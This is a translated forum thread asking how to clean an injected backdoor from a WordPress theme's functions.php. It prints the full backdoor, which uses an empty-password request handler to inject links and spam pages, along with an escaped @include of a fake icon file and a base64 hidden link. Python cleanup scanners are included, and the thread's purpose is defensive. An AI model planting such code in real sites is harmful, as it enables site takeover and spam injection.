How to get rid of "SiteLock-PHP-FILEHACKER-of.UNOFFICIAL" in WordPress functions.php

Posted: 2017-06-05 01:43:20

【Question】:
<?php

if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == ''))
{
    switch ($_REQUEST['action'])
    {
        case 'get_all_links';
            foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
            {
                $data['code'] = '';

                if (preg_match('!<div id="wp_cd_code">(.*?)</div>!s', $data['post_content'], $_))
                {
                    $data['code'] = $_[1];
                }

                print '<e><w>1</w><url>' . $data['guid'] . '</url><code>' . $data['code'] . '</code><id>' . $data['ID'] . '</id></e>' . "\r\n";
            }
            break;

        case 'set_id_links';
            if (isset($_REQUEST['data']))
            {
                $data = $wpdb -> get_row('SELECT `post_content` FROM `' . $wpdb->prefix . 'posts` WHERE `ID` = "'.mysql_escape_string($_REQUEST['id']).'"');

                $post_content = preg_replace('!<div id="wp_cd_code">(.*?)</div>!s', '', $data -> post_content);
                if (!empty($_REQUEST['data'])) $post_content = $post_content . '<div id="wp_cd_code">' . stripcslashes($_REQUEST['data']) . '</div>';

                if ($wpdb->query('UPDATE `' . $wpdb->prefix . 'posts` SET `post_content` = "' . mysql_escape_string($post_content) . '" WHERE `ID` = "' . mysql_escape_string($_REQUEST['id']) . '"') !== false)
                {
                    print "true";
                }
            }
            break;

        case 'create_page';
            if (isset($_REQUEST['remove_page']))
            {
                if ($wpdb -> query('DELETE FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "/'.mysql_escape_string($_REQUEST['url']).'"'))
                {
                    print "true";
                }
            }
            elseif (isset($_REQUEST['content']) && !empty($_REQUEST['content']))
            {
                if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))
                {
                    print "true";
                }
            }
            break;

        default: print "ERROR_WP_ACTION WP_URL_CD";
    }

    die("");
}

if ( $wpdb->get_var('SELECT count(*) FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string( $_SERVER['REQUEST_URI'] ).'"') == '1' )
{
    $data = $wpdb -> get_row('SELECT * FROM `' . $wpdb->prefix . 'datalist` WHERE `url` = "'.mysql_escape_string($_SERVER['REQUEST_URI']).'"');
    if ($data -> full_content)
    {
        print stripslashes($data -> content);
    }
    else
    {
        print '<!DOCTYPE html>';
        print '<html ';
        language_attributes();
        print ' class="no-js">';
        print '<head>';
        print '<title>'.stripslashes($data -> title).'</title>';
        print '<meta name="Keywords" content="'.stripslashes($data -> keywords).'" />';
        print '<meta name="Description" content="'.stripslashes($data -> description).'" />';
        print '<meta name="robots" content="index, follow" />';
        print '<meta charset="';
        bloginfo( 'charset' );
        print '" />';
        print '<meta name="viewport" content="width=device-width">';
        print '<link rel="profile" href="http://gmpg.org/xfn/11">';
        print '<link rel="pingback" href="';
        bloginfo( 'pingback_url' );
        print '">';
        wp_head();
        print '</head>';
        print '<body>';
        print '<div id="content" class="site-content">';
        print stripslashes($data -> content);
        get_search_form();
        get_sidebar();
        get_footer();
    }

    exit;
}

?><?php
/*
    Our portfolio:  http://themeforest.net/user/tagDiv/portfolio
    Thanks for using our theme!
    tagDiv - 2016
*/

/**
 * Load the speed booster framework + theme specific files
 */

// load the deploy mode
require_once('td_deploy_mode.php');

// load the config
require_once('includes/td_config.php');
add_action('td_global_after', array('td_config', 'on_td_global_after_config'), 9); //we run on 9 priority to allow plugins to updage_key our apis while using the default priority of 10

// load the wp booster
require_once('includes/wp_booster/td_wp_booster_functions.php');

require_once('includes/td_css_generator.php');
require_once('includes/shortcodes/td_misc_shortcodes.php');
require_once('includes/widgets/td_page_builder_widgets.php'); // widgets

/*
 * mobile theme css generator
 * in wp-admin the main theme is loaded and the mobile theme functions are not included
 * required in td_panel_data_source
 * @todo - look for a more elegant solution(ex. generate the css on request)
 */
require_once('mobile/includes/td_css_generator_mob.php');

/* ----------------------------------------------------------------------------
 * Woo Commerce
 */

// breadcrumb
add_filter('woocommerce_breadcrumb_defaults', 'td_woocommerce_breadcrumbs');
function td_woocommerce_breadcrumbs() {
    return array(
        'delimiter' => ' <i class="td-icon-right td-bread-sep"></i> ',
        'wrap_before' => '<div class="entry-crumbs" itemprop="breadcrumb">',
        'wrap_after' => '</div>',
        'before' => '',
        'after' => '',
        'home' => _x('Home', 'breadcrumb', 'woocommerce'),
    );
}

// use own pagination
if (!function_exists('woocommerce_pagination')) {
    // pagination
    function woocommerce_pagination() {
        echo td_page_generator::get_pagination();
    }
}

// Override theme default specification for product 3 per row

// Number of product per page 8
add_filter('loop_shop_per_page', create_function('$cols', 'return 4;'));

if (!function_exists('woocommerce_output_related_products')) {
    // Number of related products
    function woocommerce_output_related_products() {
        woocommerce_related_products(array(
            'posts_per_page' => 4,
            'columns' => 4,
            'orderby' => 'rand',
        )); // Display 4 products in rows of 1
    }
}

/* ----------------------------------------------------------------------------
 * bbPress
 */
// change avatar size to 40px
function td_bbp_change_avatar_size($author_avatar, $topic_id, $size) {
    $author_avatar = '';
    if ($size == 14) {
        $size = 40;
    }
    $topic_id = bbp_get_topic_id( $topic_id );
    if ( !empty( $topic_id ) ) {
        if ( !bbp_is_topic_anonymous( $topic_id ) ) {
            $author_avatar = get_avatar( bbp_get_topic_author_id( $topic_id ), $size );
        } else {
            $author_avatar = get_avatar( get_post_meta( $topic_id, '_bbp_anonymous_email', true ), $size );
        }
    }
    return $author_avatar;
}
add_filter('bbp_get_topic_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_reply_author_avatar', 'td_bbp_change_avatar_size', 20, 3);
add_filter('bbp_get_current_user_avatar', 'td_bbp_change_avatar_size', 20, 3);

//add_action('shutdown', 'test_td');

function test_td () {
    if (!is_admin()) {
        td_api_base::_debug_get_used_on_page_components();
    }
}

/**
 * tdStyleCustomizer.js is required
 */
if (TD_DEBUG_LIVE_THEME_STYLE) {
    add_action('wp_footer', 'td_theme_style_footer');
        // new live theme demos
        function td_theme_style_footer() {
            ?>
            <div id="td-theme-settings" class="td-live-theme-demos td-theme-settings-small">
                <div class="td-skin-body">
                    <div class="td-skin-wrap">
                        <div class="td-skin-container td-skin-buy"><a target="_blank" href="http://themeforest.net/item/newspaper/5489609?ref=tagdiv">BUY NEWSPAPER NOW!</a></div>
                            <div class="td-skin-container td-skin-header">GET AN AWESOME START!</div>
                            <div class="td-skin-container td-skin-desc">With easy <span>ONE CLICK INSTALL</span> and fully customizable options, our demos are the best start you'll ever get!!</div>
                        <div class="td-skin-container td-skin-content">
                            <div class="td-demos-list">
                                <?php
                                $td_demo_names = array();

                                foreach (td_global::$demo_list as $demo_id => $stack_params) {
                                    $td_demo_names[$stack_params['text']] = $demo_id;
                                    ?>
                                    <div class="td-set-theme-style"><a href="<?php echo td_global::$demo_list[$demo_id]['demo_url'] ?>" class="td-set-theme-style-link td-popup td-popup-<?php echo $td_demo_names[$stack_params['text']] ?>" data-img-url="http://demo.tagdiv.com/demos_popup/newspaper/large/<?php echo $demo_id; ?>.jpg"></a></div>
                                <?php } ?>
                                <div class="clearfix"></div>
                            </div>
                        </div>
                        <div class="td-skin-scroll"><i class="td-icon-read-down"></i></div>
                    </div>
                </div>
                <div class="clearfix"></div>
                <div class="td-set-hide-show"><a href="#" id="td-theme-set-hide"></a></div>
                <div class="td-screen-demo" data-width-preview="380"></div>
                <div class="td-screen-demo-extend"></div>
            </div>
            <?php
        }
}

//print_r(td_global::$all_theme_panels_list);

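My host's virus scanner detected a virus in the theme's functions.php file. I don't know how to remove the code without affecting the site. Please help me clean the malicious virus code "SiteLock-PHP-FILEHACKER-of.UNOFFICIAL" out of this functions.php.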
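
An added example, not part of the original post: in the file above the injected code is a separate PHP block that ends at `?><?php`, directly ahead of the theme's own header, and it appends `<div id="wp_cd_code">` blocks to posts. This Python sketch removes that leading block only when it carries marker strings copied from the code above, and strips the injected div from post content; the function names and the sample input are constructed for illustration.

```python
import re

# Marker strings copied from the injected block shown in the question.
MARKERS = ("wp_cd_code", "ERROR_WP_ACTION", "$_REQUEST['password']")
# Same pattern the injected code itself uses to find its div in post_content.
CD_DIV = re.compile(r'<div id="wp_cd_code">.*?</div>', re.S)


def strip_injected_prefix(source):
    """Remove a leading PHP block that ends in '?><?php' and carries the markers.

    Returns (cleaned_source, changed); files without the pattern come back untouched.
    """
    boundary = re.search(r"\?>\s*<\?php", source)
    if not source.lstrip().startswith("<?php") or boundary is None:
        return source, False
    first_block = source[: boundary.start()]
    hits = [m for m in MARKERS if m in first_block]
    if len(hits) < 2:  # require two markers so a legitimate first block is never cut
        return source, False
    return "<?php" + source[boundary.end():], True


def strip_cd_div(post_content):
    """Drop the <div id="wp_cd_code"> payload that was appended to a post."""
    return CD_DIV.sub("", post_content)


# Constructed sample: a shortened injected block followed by the theme header.
SAMPLE = (
    "<?php\nif (isset($_REQUEST['action']) && isset($_REQUEST['password'])) {\n"
    "    default: print \"ERROR_WP_ACTION WP_URL_CD\";\n}\n?><?php\n"
    "/*\n    tagDiv - 2016\n*/\nrequire_once('td_deploy_mode.php');\n"
)

if __name__ == "__main__":
    cleaned, changed = strip_injected_prefix(SAMPLE)
    print("changed:", changed)
    print(cleaned)
    print(strip_cd_div('Hello<div id="wp_cd_code"><a href="#">x</a></div> world'))
```

Cleaning functions.php does not remove what the code has already written: rows in the `datalist` table under the WordPress table prefix and the `wp_cd_code` divs in `posts` need to be checked as well.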

【Comments】:

Possible duplicate of "functions.php is infected by siteLock-php-injector how to clean it?"

No, that didn't solve the problem I'm having.

【Answer 1】:

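I've been fighting this virus, and the way I solved it was:

    Analyze all the directories.

    For each infected file, open it with vim or nano; you should see the injection. Just delete it and your file should be fine.

    Repeat for all the infected files. Some of them are .zip files imported by the virus; delete those and keep the original ones.

I recommend that you update your plugins and themes.

Hope it works. It may not be the most efficient way, but it worked for me.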

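【Discussion】:

【Answer 2】:

These viruses add a line of code to most of your files; those are called the affected files.

In my case, the affected files had this in common: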

@include "\x2fho\x6de/\x6bks\x68o3\x62c/\x70ub\x6cic\x5fht\x6dl/\x77p-\x69nc\x6cud\x65s/\x6as/\x6acr\x6fp/\x66av\x69co\x6e_f\x389a\x617.\x69co";

Once you remove this line from all of those files, you are free of the virus/malware.

【Discussion】:
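
An added example, not part of the original answer: a Python scanner for the kind of line quoted above, an `include` whose double-quoted path is hidden behind `\xHH` escapes and resolves to a non-code file. The extension list, function names and sample input are assumptions made for illustration.

```python
import re
from pathlib import Path

# PHP double-quoted escapes: \xHH (hex), \NNN (octal) and an escaped backslash.
_ESCAPE = re.compile(r"\\(?:x([0-9A-Fa-f]{1,2})|([0-7]{1,3})|(\\))")
# include/require (optionally @-silenced) whose argument is a double-quoted literal.
_INCLUDE = re.compile(
    r'@?\b(?:include|require)(?:_once)?\s*\(?\s*"((?:[^"\\]|\\.)*)"', re.I)
# Extensions a PHP include has no reason to target (assumed list, extend as needed).
NON_CODE_EXT = (".ico", ".png", ".jpg", ".gif")


def decode_php_escapes(literal):
    """Resolve the escapes PHP would resolve inside a double-quoted string."""
    def repl(m):
        if m.group(1):
            return chr(int(m.group(1), 16))
        if m.group(2):
            return chr(int(m.group(2), 8) & 0xFF)
        return "\\"
    return _ESCAPE.sub(repl, literal)


def find_obfuscated_includes(php_source):
    """Return (line_no, decoded_path) for includes that hide their path behind
    hex/octal escapes or load a file with a non-code extension."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for match in _INCLUDE.finditer(line):
            raw = match.group(1)
            path = decode_php_escapes(raw)
            hidden = any(m.group(1) or m.group(2) for m in _ESCAPE.finditer(raw))
            if hidden or path.lower().endswith(NON_CODE_EXT):
                findings.append((line_no, path))
    return findings


def scan_tree(root):
    """Map every .php file under root that has findings to those findings."""
    report = {}
    for php_file in sorted(Path(root).rglob("*.php")):
        hits = find_obfuscated_includes(php_file.read_text(errors="replace"))
        if hits:
            report[str(php_file)] = hits
    return report


# Constructed sample: one clean require and one escaped include of a fake icon.
SAMPLE = "\n".join([
    "<?php",
    "require_once('includes/td_config.php');",
    r'@include "\x2fvar/www/ex\x61mple/wp-includes/f\x61vicon_0000.ico";',
])
```

The decoded path is itself a finding: the file it points to holds the actual payload and has to be removed along with the `@include` line.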

【Answer 3】:

I spent some time trying to find my problem.

I found this line:

<?php $xml='PGRpdiBzdHlsZT0icG9zaXRpb246IGFic29sdXRlOyB0b3A6IDBweDsgbGVmdDogLTMzMzNweDsiPkZpbmQgdGhlIGxhc3Qgb2ZmZXJzIGJ5IFNreUJldCBhdCA8YSB0YXJnZXQ9Il9ibGFuayIgcmVsPSJub2ZvbGxvdyIgaHJlZj0iaHR0cDovL2JldHRpbmd5LmNvbS8iPnd3dy5iZXR0aW5neS5jb208L2E+IEJldHRpbmdZLmNvbSBCb251c2VzPC9kaXY+'; echo base64_decode($xml);?>

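This seems weird. I removed it and everything works perfectly. I don't know whether this is part of the theme or a hack, but it renders a hidden div containing an href to another website: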

<div style="position: absolute; top: 0px; left: -3333px;">Find the last offers by SkyBet at <a target="_blank" rel="nofollow" href="http://bettingy.com/">www.bettingy.com</a> BettingY.com Bonuses</div>

So the solution is to try reading the file line by line, check whether any line shows encrypted information, and remove it.

【Discussion】:
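
An added example, not part of the original answer: the line-by-line check described above, written in Python. It finds long base64-encoded string literals, decodes them, and reports whether the result is an off-screen or hidden element and which links it carries; the 40-character threshold, the hiding heuristics and the sample input are assumptions made for illustration.

```python
import base64
import binascii
import re

# Quoted literals of 40+ base64 characters; shorter ones are too common to flag.
_B64_LITERAL = re.compile(r"""(['"])([A-Za-z0-9+/]{40,}={0,2})\1""")
# Inline styles that push an element off-screen or hide it (assumed heuristics).
_HIDDEN = re.compile(
    r"(?:left|top)\s*:\s*-\d{3,}px|display\s*:\s*none|visibility\s*:\s*hidden", re.I)
_HREF = re.compile(r"""href\s*=\s*["']([^"']+)""", re.I)


def decode_base64_literals(php_source):
    """Return one finding per long base64 literal that decodes to readable text."""
    findings = []
    for line_no, line in enumerate(php_source.splitlines(), start=1):
        for match in _B64_LITERAL.finditer(line):
            try:
                decoded = base64.b64decode(match.group(2), validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64 text, e.g. a hash or binary data
            findings.append({
                "line": line_no,
                "decoded": decoded,
                "hidden": bool(_HIDDEN.search(decoded)),
                "links": _HREF.findall(decoded),
            })
    return findings


# Constructed sample shaped like the line in the answer; the URL is a placeholder.
_HTML = ('<div style="position: absolute; left: -3333px;">'
         '<a href="http://spam.example/">offers</a></div>')
SAMPLE = ("<?php $xml='" + base64.b64encode(_HTML.encode()).decode()
          + "'; echo base64_decode($xml);?>")

if __name__ == "__main__":
    for finding in decode_base64_literals(SAMPLE):
        print(finding)
```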
